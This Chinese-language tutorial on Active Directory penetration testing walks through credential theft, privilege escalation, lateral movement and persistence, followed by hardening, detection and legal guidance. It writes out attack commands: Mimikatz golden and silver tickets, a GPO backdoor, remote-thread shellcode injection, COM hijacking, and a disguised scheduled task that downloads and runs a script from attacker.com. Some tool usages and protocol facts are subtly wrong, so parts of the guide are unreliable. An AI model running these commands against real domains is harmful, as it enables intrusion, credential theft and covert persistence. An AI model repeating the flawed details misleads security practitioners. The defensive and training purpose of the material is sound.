Active Directory域渗透攻防技术与防御实践

1. 域渗透攻防技术全景解析

Active Directory（AD）域环境作为企业级网络的核心架构，其安全防护水平直接关系到整个组织的数字资产安全。过去五年间，针对域环境的渗透测试需求增长了近300%，这既反映了企业安全意识的提升，也暴露出域安全建设的诸多薄弱环节。本指南将从攻击者视角还原完整的域渗透路径，同时为企业防御者提供针对性的加固方案。

域渗透的本质是通过合法或非法的凭证，在域环境中实现权限提升和横向移动的过程。与单机渗透不同，域环境中的计算机通过信任关系相互连接，这使得一次成功的初始入侵可能引发"多米诺骨牌"效应。根据MITRE ATT&CK框架统计，近70%的高级持续性威胁(APT)都会利用域特性进行内网扩散。

2. 域环境基础架构剖析

2.1 核心组件工作原理

域控制器(DC)作为整个AD域的中枢神经，运行着以下关键服务：

• Kerberos认证服务（端口88）
• LDAP目录服务（端口389/636）
• DNS服务（端口53）
• SMB文件共享（端口445）

这些服务在提供便利的同时，也成为了攻击者重点关注的攻击面。以Kerberos协议为例，其TGT票据的默认有效期为10小时，而TGS票据的续订期限可达7天，这种设计特性直接影响了后续的黄金票据攻击手法。

2.2 常见域拓扑结构

企业域环境通常呈现三种典型架构：

1. 单域单站点：适用于中小型企业，所有DC位于同一物理位置
2. 多域单森林：集团型企业常见架构，包含父域和多个子域
3. 多域多森林：跨国企业采用，不同业务单元使用独立森林

不同架构下的渗透路径存在显著差异。在多域环境中，攻击者往往会利用域间信任关系进行跨域攻击，此时需要特别关注SID过滤和选择性认证等安全机制。

3. 域渗透完整攻击链

3.1 初始访问阶段

3.1.1 凭证获取技术

• LLMNR/NBT-NS投毒：响应局域网内的名称解析请求，诱导用户提交凭证

powershell复制Invoke-LLMNRPoison -InterfaceIndex 12 -Tool Responder

• SMB中继攻击：将捕获的哈希转发至其他主机进行认证

bash复制ntlmrelayx.py -tf targets.txt -smb2support

3.1.2 漏洞利用案例

针对未打补丁的域成员服务器，可尝试以下漏洞：

• MS17-010（永恒之蓝）：适用于Windows 7/Server 2008 R2
• Zerologon（CVE-2020-1472）：直接危害域控制器安全
• PrintNightmare（CVE-2021-1675）：通过打印服务提权

3.2 权限提升技术

3.2.1 本地提权路径

• 服务账户滥用：检查可写服务路径

powershell复制Get-WmiObject -Class Win32_Service | Where-Object {$_.PathName -like "*temp*"}

• AlwaysInstallElevated：利用MSI安装包获取SYSTEM权限

cmd复制reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

3.2.2 域内提权手法

• Kerberoasting：提取服务账户的TGS票据进行离线破解

powershell复制Get-DomainUser -SPN | Request-SPNTicket -OutputFormat Hashcat

• ACL滥用：检查域对象上的非标准权限设置

powershell复制Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {$_.IdentityReference -match "TEST\\User1"}

3.3 横向移动策略

3.3.1 凭证传递技术

• 哈希传递（PtH）：使用NTLM哈希进行认证

bash复制psexec.py -hashes :<hash> domain/user@target

• 票据传递（PtT）：注入Kerberos票据

powershell复制Invoke-Mimikatz -Command '"kerberos::ptt ticket.kirbi"'

3.3.2 远程执行方法

• WMI远程命令执行：

powershell复制Invoke-WMIExec -Target DC01 -Command "whoami" -Domain TEST -Username user1 -Hash <hash>

• DCOM对象滥用：通过MMC20.Application远程执行

vbnet复制$com = [Type]::GetTypeFromProgID("MMC20.Application","192.168.1.10")

3.4 持久化维持技术

3.4.1 账户操作

• 黄金票据：伪造KRBTGT账户的TGT

powershell复制Invoke-Mimikatz -Command '"kerberos::golden /domain:test.com /sid:S-1-5-21-... /krbtgt:<hash> /user:Administrator /id:500 /groups:512 /ptt"'

• 白银票据：针对特定服务伪造TGS

powershell复制kerberos::golden /domain:test.com /sid:... /target:DC01.test.com /service:cifs /rc4:<hash> /user:Administrator /ptt

3.4.2 组策略对象(GPO)滥用

• 创建启动脚本：

powershell复制New-GPO -Name "Update Scripts" | New-GPLink -Target "OU=Workstations,DC=test,DC=com"
Set-GPRegistryValue -Name "Update Scripts" -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Backdoor" -Value "cmd.exe /c calc.exe" -Type String

4. 防御体系构建指南

4.1 主动防御措施

4.1.1 安全配置基线

• 启用LSA保护：

reg复制[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"RunAsPPL"=dword:00000001

• 限制NTLM使用：

powershell复制New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0" -Name "RestrictSendingNTLMTraffic" -Value 2 -PropertyType DWORD

4.1.2 日志监控策略

关键日志事件ID监控清单：

4.2 应急响应流程

4.2.1 入侵指标(IOC)检测

• 异常Kerberos请求：

xpath复制EventID=4769 AND ServiceName NOT IN ("krbtgt","MSSQLSvc") AND TicketEncryptionType=0x17

• 可疑的WMI持久化：

powershell复制Get-WmiObject -Namespace root\Subscription -Class __EventFilter

4.2.2 事件响应步骤

1. 立即隔离受影响系统
2. 重置KRBTGT账户密码两次（需间隔24小时）
3. 审核域管理员组成员变更
4. 检查所有GPO的修改历史
5. 分析DC上的安全事件日志

5. 实战攻防演练案例

5.1 红队视角：完整渗透路径

某企业网络渗透测试实录：

1. 通过钓鱼邮件获取初始立足点（Office宏病毒）
2. 发现内网存在LLMNR广播，实施投毒攻击获取域用户哈希
3. 对SMB服务进行中继攻击，获得域成员服务器权限
4. 提取内存凭证发现服务账户，通过Kerberoasting破解获得SPN密码
5. 利用该凭证登录文件服务器，在共享目录发现备份的GPO文件
6. 分析GPO文件获取域管理员密码的Base64编码片段
7. 组合密码片段成功登录域控制器

5.2 蓝队视角：防御体系突破

防御方采取的对抗措施：

1. 部署NetCease工具阻断NTLMv1流量
2. 启用Windows Defender ATP检测异常PSExec使用
3. 配置SIEM规则监控异常的Kerberos票据请求
4. 实施Just Enough Administration限制管理权限
5. 启用Credential Guard保护LSASS进程

6. 进阶工具与技术

6.1 现代C2框架运用

6.1.1 Cobalt Strike特性

• 信标(Beacon)的多样化通信方式（HTTP/S、DNS、SMB）
• Malleable C2配置文件定制化

profile复制http-get {
    set uri "/api/collect";
    client {
        header "Accept" "*/*";
        metadata {
            base64url;
            prepend "SESSION=";
            header "Cookie";
        }
    }
}

6.1.2 Sliver框架实战

• 生成阶段化Payload：

bash复制sliver > generate --mtls 192.168.1.100 --save /tmp/payload.exe

• 横向移动模块：

bash复制sliver > ps -R explorer.exe -P 192.168.1.15

6.2 免杀技术演进

6.2.1 内存操作技术

• 反射式DLL注入：

cpp复制HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
LPVOID pRemoteMem = VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProcess, pRemoteMem, shellcode, sizeof(shellcode), NULL);
CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteMem, NULL, 0, NULL);

6.2.2 合法程序滥用

• COM劫持技术：

reg复制[HKEY_CURRENT_USER\Software\Classes\CLSID\{...}\InprocServer32]
@="C:\\malware.dll"
"ThreadingModel"="Apartment"

• 计划任务伪装：

powershell复制$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/script.ps1')"
$trigger = New-ScheduledTaskTrigger -AtLogOn
Register-ScheduledTask -TaskName "Adobe Updater" -Action $action -Trigger $trigger -RunLevel Highest

7. 企业级防御体系建设

7.1 网络分段策略

7.1.1 零信任架构实施

• 微分段技术方案对比：
  | 技术类型 | 实现方式 | 管理复杂度 | 防护效果 |
  |----------|----------|------------|----------|
  | VLAN隔离 | 传统网络划分 | 低 | 有限 |
  | 软件定义边界 | 基于身份的访问控制 | 中 | 良好 |
  | 主机防火墙 | 端点级策略控制 | 高 | 优秀 |

7.1.2 关键资产保护

• 域控制器网络ACL示例：

cisco复制access-list 110 permit tcp host 192.168.1.100 host 10.0.0.10 eq 88
access-list 110 permit tcp host 192.168.1.100 host 10.0.0.10 eq 389
access-list 110 deny ip any host 10.0.0.10 log

7.2 高级威胁检测

7.2.1 异常行为分析

• Kerberos加密类型异常检测：

kusto复制SecurityEvent
| where EventID == 4769
| where TicketEncryptionType != "0x12" // 非AES256加密
| project TimeGenerated, AccountName, ServiceName, ClientAddress

7.2.2 UEBA规则示例

• 可疑的权限使用序列：

sql复制SELECT user_id, COUNT(DISTINCT event_type) AS unique_actions
FROM security_logs 
WHERE timestamp > NOW() - INTERVAL '1 hour'
GROUP BY user_id
HAVING COUNT(DISTINCT event_type) > 5
ORDER BY unique_actions DESC

8. 法律合规与道德边界

8.1 渗透测试法律框架

8.1.1 授权范围界定

• 测试授权书必备条款：

1. 明确测试时间窗口（含时区）
2. 指定源IP地址范围
3. 禁止使用的攻击手法清单
4. 数据访问与存储规范
5. 应急联系机制

8.1.2 证据保全要求

• 日志记录标准：

1. 所有操作必须通过跳板机进行
2. 记录完整的命令行历史
3. 保存屏幕录像和网络流量捕获
4. 使用数字签名工具记录关键操作

8.2 安全研究伦理准则

8.2.1 漏洞披露规范

• 负责任的披露流程：

1. 私密通知厂商安全团队
2. 提供90天修复期
3. 发布技术细节前协调CVE编号
4. 配套发布缓解措施指南

8.2.2 红队行动守则

• 操作红线清单：

1. 绝不触碰非授权系统
2. 禁止数据泄露测试
3. 避免生产环境DoS测试
4. 测试后彻底清理痕迹
5. 严格保护客户数据机密性

9. 持续学习路径

9.1 技术能力矩阵

9.1.1 核心技能评估

9.1.2 认证体系规划

• 基础阶段：CompTIA Security+
• 进阶阶段：OSCP认证
• 专业阶段：OSEP/OSED认证
• 专家阶段：SANS GIAC系列认证

9.2 社区资源推荐

9.2.1 研究博客精选

• SpecterOps团队博客（AD安全专题）
• HarmJ0y系列文章（PowerView深度解析）
• SilentBreak Security（C2框架技术内幕）

9.2.2 实验环境搭建

• 自动化域环境构建工具：

bash复制git clone https://github.com/BloodHoundAD/BloodHound-Tools
cd BloodHound-Tools
./build-lab.sh -d test.com -u 50 -c 10

重要提示：所有渗透测试技术必须严格在授权环境下使用。在实际防御部署中，建议采用"假设已被入侵"的思维方式，重点关注攻击者可能利用的信任关系和权限配置。定期进行红蓝对抗演练是检验防御体系有效性的最佳方式。